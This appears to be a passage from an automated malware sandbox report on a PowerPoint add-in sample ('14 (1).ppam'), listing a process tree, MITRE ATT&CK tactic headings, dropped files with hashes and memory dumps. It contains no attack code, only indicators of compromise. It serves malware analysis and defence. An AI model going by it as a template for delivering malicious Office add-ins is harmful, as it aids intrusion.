        "C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" "C:\Users\Admin\Downloads\14 (1).ppam" /ou ""
        PID:6084
      • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2124,10112653691424254004,2794949916676608801,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5472 /prefetch:8
        Suspicious behavior: EnumeratesProcesses
        PID:5360
    • C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe
      "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe" /PRODUCT:Reader /VERSION:19.0 /MODE:3
      Suspicious use of SetWindowsHookEx
      PID:5176
      • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Reader_sl.exe
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Reader_sl.exe"
        PID:4000
  • C:\Windows\System32\CompPkgSrv.exe
    C:\Windows\System32\CompPkgSrv.exe -Embedding
    PID:5116
  • C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k appmodel -p -s camsvc
    PID:5348
Network
MITRE ATT&CK Matrix
Collection
Command and Control
Credential Access
Defense Evasion
Execution
Exfiltration
Impact
Initial Access
Lateral Movement
Privilege Escalation
Downloads
• C:\ProgramData\ddond.com
  MD5    0b4340ed812dc82ce636c00fa5c9bef2
  SHA1   51c97ebe601ef079b16bcd87af827b0be5283d96
  SHA256 dba3137811c686fd35e418d76184070e031f207002649da95385dfd05a8bb895
  SHA512 d9df8c1f093ea0f7bde9c356349b2ba43e3ca04b4c87c0f33ab89dda5afe9966313a09b60720aa22a1a25d43d7c71a060af93fb8f6488201a0e301c83fa18045
• C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6
  MD5    1fca0539de02091fc4d207211364e566
  SHA1   61a6af3a2153a70277b7de7495ecef4110bb9989
  SHA256 e6a9491850b7d6fc6bd7d592a8ff4fc057952a137abb7d3d39b3d0bb3b8f667b
  SHA512 a1a657812f96ef839d793ffb6f249765ed24e906f5b3a22872c52e5b687480fdd7cc2334956e42198d70fa931f77ef50cbc8e1aaae6959ba3036a9035eeea823
• C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\80237EE4964FC9C409AAF55BF996A292_C5130A0BDC8C859A2757D77746C10868
  MD5    61bbc21b6075c76df0e0ed177c534185
  SHA1   efcec703b65ae25e95736755f0fd80cdb5569c13
  SHA256 0c2f98b4f41006d5bee3534e07ff7047cffd42c7f53f4ce6861d458e96457164
  SHA512 a31af35f8fb5a566fa02c40156693db6ba54d75b8a3e3acac65cbc9e1d4eb9ea627f395bacfb3ac0b9854d9ef29f0e16ea958ebfe8201cff70096ff90ef61727
• C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\80237EE4964FC9C409AAF55BF996A292_E503B048B745DFA14B81FCFC68D6DECE
  MD5    c6f11751f23f273c02be06f64ca0e2f2
  SHA1   43dd2140da95c53f964ef88db67187451581625f
  SHA256 063e20533cd1e709c8c1965ccd1cfbff2b3c6a37683f03a244da1a5101a3bc81
  SHA512 23e69bede2c1fee2f559f00aeb69c122f4c987c76d6455fa1ff484dc23008566b02edd93ee6a57c179c71e71114a0638c948900b4fff5b731ff99e81cbeae001
• C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6
  MD5    6756c40edf649ec888c0e888446cacb9
  SHA1   59ad25a4a9ff545995b5bcce1abd411e7f07060a
  SHA256 794f4be6bac263da5983ef90891f923230f14f15b4c68b60c2248b834f0526d2
  SHA512 af6022b791d65c83d50205c498dd8fd76d70e8cf7563b373024fd9887b8d9400d4b6cfd7cd72084a94447127afc1e1a3de28984af5eef1ae2a2ef182354a1ac9
• C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\80237EE4964FC9C409AAF55BF996A292_C5130A0BDC8C859A2757D77746C10868
  MD5    bfa52515350fe02ef978aed07e758049
  SHA1   95972681781c46b22c5adc90bffed1e94f09d64c
  SHA256 d584b8348f562647b43f0769750b05bafe94194188fe695aea3b1fff3c334eff
  SHA512 28ba9afed478d4ab4f413de12040b27d7966eaa6958b96fa57bf430ad4a95f94cf3866f7a5e6e44b559ca5b30d383b26248d10ecdf5232194c786ef79f9f3245
• C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\80237EE4964FC9C409AAF55BF996A292_E503B048B745DFA14B81FCFC68D6DECE
  MD5    4dd1120e370440f036f0ff39feb41deb
  SHA1   e715b0fd2932db814e29c1b55fb8b690970812d9
  SHA256 17a92d4c5dd525dd6f795b9bd6428a6047f60e0515b939d39218ee740cd550be
  SHA512 e4fae14b67ea0351d6cb18a84d95b13aa7bd1bddeed4f7da536afb9e336615c20416f8a6181a8c8538a4f33da1a1ff3ceb6facd576f8bffd37aab5115fd08903
• C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
  MD5    0f2fd3ffef216b4a9345a3bf7c19e54c
  SHA1   bb53767f6009d83c4af27ddb9f72b88d2dea8c1c
  SHA256 4587b60ec8ed42f34c0c85604a70363bd7e82b5dac6b6e14629e3a5672b3e98a
  SHA512 5987b7af8b369ad6208688a59562c6d187b45a64cc307af5d96da4cbfc6c146c71bcc493f9a66bf23d2d249416222bb728e9072a44a7d9a13355647768b32900
• C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
  MD5    95e22ee8bac6765a868c13fc5ca5017c
  SHA1   dff7d454639c700bb4408bf2cef900337977eb56
  SHA256 cb320ebc79962dfd60205d687132b62ac884924f6cf5c5a40aea28fd2bc44802
  SHA512 47fb43256f59834aaf626e3c9c9e20f71afbb018f64755d8e05f6cbd8dde21e1c14049192a90bffd99413a58a0cacebdd8bce7b3d464aa622d7eefad71145428
• C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
  MD5    1c3983e2604936fa4420627b5fdcb6f5
  SHA1   83991de09f6bae339679274f874188ff154d72f8
  SHA256 6762e25a87c7acf43482319e524c55a25550d898762b78972f5771903697176c
  SHA512 2e943097f3c98ba2591ea467effb4314025222c3bc4a10effc875cb0bba7899be7b09e2777a144854f3093d47cbde49d3a0d96ff06e674341d26f4af41290c4a
• C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\SmartScreen\remote\edgeSettings
  MD5    f222079e71469c4d129b335b7c91355e
  SHA1   0056c3003874efef229a5875742559c8c59887dc
  SHA256 e713c1b13a849d759ebaa6256773f4f1d6dfc0c6a4247edaa726e0206ecacb00
  SHA512 e5a49275e056b6628709cf6509a5f33f8d1d1e93125eaa6ec1c7f51be589fd3d8ea7a59b9639db586d76a994ad3dc452c7826e4ac0c8c689dd67ff90e33f0b75
• C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\SmartScreen\remote\edgeSettings_2.0-2f9188b68640dbf72295f9083a21d674a314721ef06f82db281cbcb052ff8ec1
  MD5    6698422bea0359f6d385a4d059c47301
  SHA1   b1107d1f8cc1ef600531ed87cea1c41b7be474f6
  SHA256 2f9188b68640dbf72295f9083a21d674a314721ef06f82db281cbcb052ff8ec1
  SHA512 d0cdb3fa21e03f950dbe732832e0939a4c57edc3b82adb7a556ebd3a81d219431a440357654dfea94d415ba00fd7dcbd76f49287d85978d12c224cbfa8c1ad8d
• C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\SmartScreen\remote\synchronousLookupUris
  MD5    95878acc2f35f7e0cab25eafa5a0015d
  SHA1   e673cb8e7108c1df1e1f6c6dd038bdfae0b640af
  SHA256 b732281984e203f7511780bc3622d4d96dcb1fad3c8bac69077572e16f71c1ff
  SHA512 4e26bf0ba35e4a8900bd264527242a6e015d786b3c5a470188058097be68f55f7c8b8aaca607f2b8e0cf3b5caea80b4a1c12125ffe163ec4ebdaec6fb9079965
• C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\SmartScreen\remote\synchronousLookupUris_637884115190248201
  MD5    d8d19e98fc8a233efa5c1792813ed8b2
  SHA1   3126b9b3144b2bb299930fa500408de8bf383827
  SHA256 624e7f0f1df15e5dba4b8189a40d15949b143fb7ef866e26d76524bd5a1df3d1
  SHA512 e09b774c107b8a1ab78cc4695e4690c54c80df8df8a13a1d2abac986ad0c309d3ed81f4e697d72054b6f5590ef01a7604f3d202096b12d69c92d860cd5cd9343
• C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\SmartScreen\remote\topTraffic
  MD5    ce545b52b20b2f56ffb26d2ca2ed4491
  SHA1   ebe904c20bb43891db4560f458e66663826aa885
  SHA256 e9d5684e543b573010f8b55b11bf571caf0a225cdea03f520091525978023899
  SHA512 1ea06c8e3f03efdd67779969b4cdf7d8e08f8327298668a7cffd67d1753f33cf19e6995a3d83fe45185c55b950f41e48ac71b422b91e8d0180b5bdd07cfacfe9
• C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\SmartScreen\remote\topTraffic_637811103879324684
  MD5    a7aab197b91381bcdec092e1910a3d62
  SHA1   35794f2d2df163223391a2b21e1610f14f46a78f
  SHA256 6337fe4e6e7464e319dfcdadf472987592013cf80d44916f5151950b4a4ca14b
  SHA512 cffd7350d1e69ada5f64cafe42a9d77e3192927e129f2903088b66b6efc9626b5d525aedca08d473ad8fa415af1d816594b243609237dc23716d70a2ca0eb774
• C:\Users\Admin\AppData\Local\Temp\6647D6D.tmp
  MD5    0479715df4c22e9a75db1e132e8e9f74
  SHA1   c7daced7176bb34f6839e1ee91f207c5359b05eb
  SHA256 46759208a69138d6448963ca068b9e8328dd02896ceb1743489e3b9df36d448e
  SHA512 e3365ec38729b8f47b88b0e64f2fe438c3402001920c6ad3ed53f8b93b4d8f3acd997c553b584572c0a697febb2da0aebf7d4f43a146c7330a47969644981501
• C:\Users\Admin\AppData\Local\Temp\7807D6D.tmp
  MD5    0479715df4c22e9a75db1e132e8e9f74
  SHA1   c7daced7176bb34f6839e1ee91f207c5359b05eb
  SHA256 46759208a69138d6448963ca068b9e8328dd02896ceb1743489e3b9df36d448e
  SHA512 e3365ec38729b8f47b88b0e64f2fe438c3402001920c6ad3ed53f8b93b4d8f3acd997c553b584572c0a697febb2da0aebf7d4f43a146c7330a47969644981501
• C:\Users\Admin\AppData\Local\Temp\7C47D6D.tmp
  MD5    0479715df4c22e9a75db1e132e8e9f74
  SHA1   c7daced7176bb34f6839e1ee91f207c5359b05eb
  SHA256 46759208a69138d6448963ca068b9e8328dd02896ceb1743489e3b9df36d448e
  SHA512 e3365ec38729b8f47b88b0e64f2fe438c3402001920c6ad3ed53f8b93b4d8f3acd997c553b584572c0a697febb2da0aebf7d4f43a146c7330a47969644981501
• C:\Users\Admin\Downloads\14 (1).ppam
  MD5    66367046957810309248fcec536d7ccb
  SHA1   5a118ce3f251140e852927503a3743442c68ff63
  SHA256 26c3bd6b866dd452546949e169dfd0934cf53681fe53d63efa2a16db39cf131b
  SHA512 1698fc41e4fe3bfd61841e9ec50a2461583d58cc5fafb00fb3c6a31460b0b866a7c96762da22de840f2081fb8524808e0177697860582aed6b33365a62f1fd08
• \??\pipe\LOCAL\crashpad_3484_KRNRFHMUSJHCEHAB
  MD5    d41d8cd98f00b204e9800998ecf8427e
  SHA1   da39a3ee5e6b4b0d3255bfef95601890afd80709
  SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
  SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
• \??\pipe\LOCAL\crashpad_4500_JKXGEPWAYAAQMAIN
  MD5    d41d8cd98f00b204e9800998ecf8427e
  SHA1   da39a3ee5e6b4b0d3255bfef95601890afd80709
  SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
  SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

• memory/216-130-0x0000000000000000-mapping.dmp
• memory/804-265-0x0000000000000000-mapping.dmp
• memory/1188-167-0x0000000000000000-mapping.dmp
• memory/1296-180-0x0000000000000000-mapping.dmp
• memory/1348-153-0x0000000000000000-mapping.dmp
• memory/1472-141-0x0000000000000000-mapping.dmp
• memory/1592-142-0x0000000000000000-mapping.dmp
• memory/1720-188-0x0000000000000000-mapping.dmp
• memory/1748-168-0x0000000000000000-mapping.dmp
• memory/2004-182-0x0000000000000000-mapping.dmp
• memory/2836-186-0x0000000000000000-mapping.dmp
• memory/3064-147-0x0000000000000000-mapping.dmp
• memory/3120-156-0x0000000000000000-mapping.dmp
• memory/3180-266-0x0000000000000000-mapping.dmp
• memory/3484-133-0x0000000000000000-mapping.dmp
• memory/3612-165-0x0000000000000000-mapping.dmp
• memory/3648-132-0x0000000000000000-mapping.dmp
• memory/3828-150-0x0000000000000000-mapping.dmp
• memory/3828-269-0x0000000000000000-mapping.dmp
• memory/4000-236-0x0000000000000000-mapping.dmp
• memory/4000-184-0x0000000000000000-mapping.dmp
• memory/4104-192-0x0000000000000000-mapping.dmp
• memory/4336-136-0x0000000000000000-mapping.dmp
• memory/4500-155-0x0000000000000000-mapping.dmp
• memory/4680-190-0x0000000000000000-mapping.dmp
• memory/4776-166-0x0000000000000000-mapping.dmp
• memory/4992-256-0x0000000000000000-mapping.dmp
• memory/5176-193-0x0000000000000000-mapping.dmp
• memory/5176-235-0x0000000000000000-mapping.dmp
• memory/5236-195-0x0000000000000000-mapping.dmp
• memory/5252-196-0x0000000000000000-mapping.dmp
• memory/5360-230-0x0000000000000000-mapping.dmp
• memory/5388-199-0x0000000000000000-mapping.dmp
• memory/5404-201-0x0000000000000000-mapping.dmp
• memory/5572-231-0x00007FFB3EDB0000-0x00007FFB3EDC0000-memory.dmp
• memory/5572-213-0x00007FFB41170000-0x00007FFB41180000-memory.dmp
• memory/5572-237-0x00007FFB3EDB0000-0x00007FFB3EDC0000-memory.dmp
• memory/5572-211-0x00007FFB41170000-0x00007FFB41180000-memory.dmp
• memory/5572-215-0x00007FFB41170000-0x00007FFB41180000-memory.dmp
• memory/5572-204-0x0000000000000000-mapping.dmp
• memory/5732-209-0x00007FFB41170000-0x00007FFB41180000-memory.dmp
• memory/5732-239-0x00007FFB41170000-0x00007FFB41180000-memory.dmp
• memory/5732-245-0x00007FFB41170000-0x00007FFB41180000-memory.dmp
• memory/5732-220-0x00007FFB41170000-0x00007FFB41180000-memory.dmp
• memory/5732-205-0x0000000000000000-mapping.dmp
• memory/5732-248-0x00007FFB41170000-0x00007FFB41180000-memory.dmp
• memory/5732-242-0x00007FFB41170000-0x00007FFB41180000-memory.dmp
• memory/5808-206-0x0000000000000000-mapping.dmp
• memory/5860-267-0x0000000000000000-mapping.dmp
• memory/5924-207-0x0000000000000000-mapping.dmp
• memory/5928-268-0x0000000000000000-mapping.dmp
• memory/6016-208-0x0000000000000000-mapping.dmp
• memory/6084-216-0x0000000000000000-mapping.dmp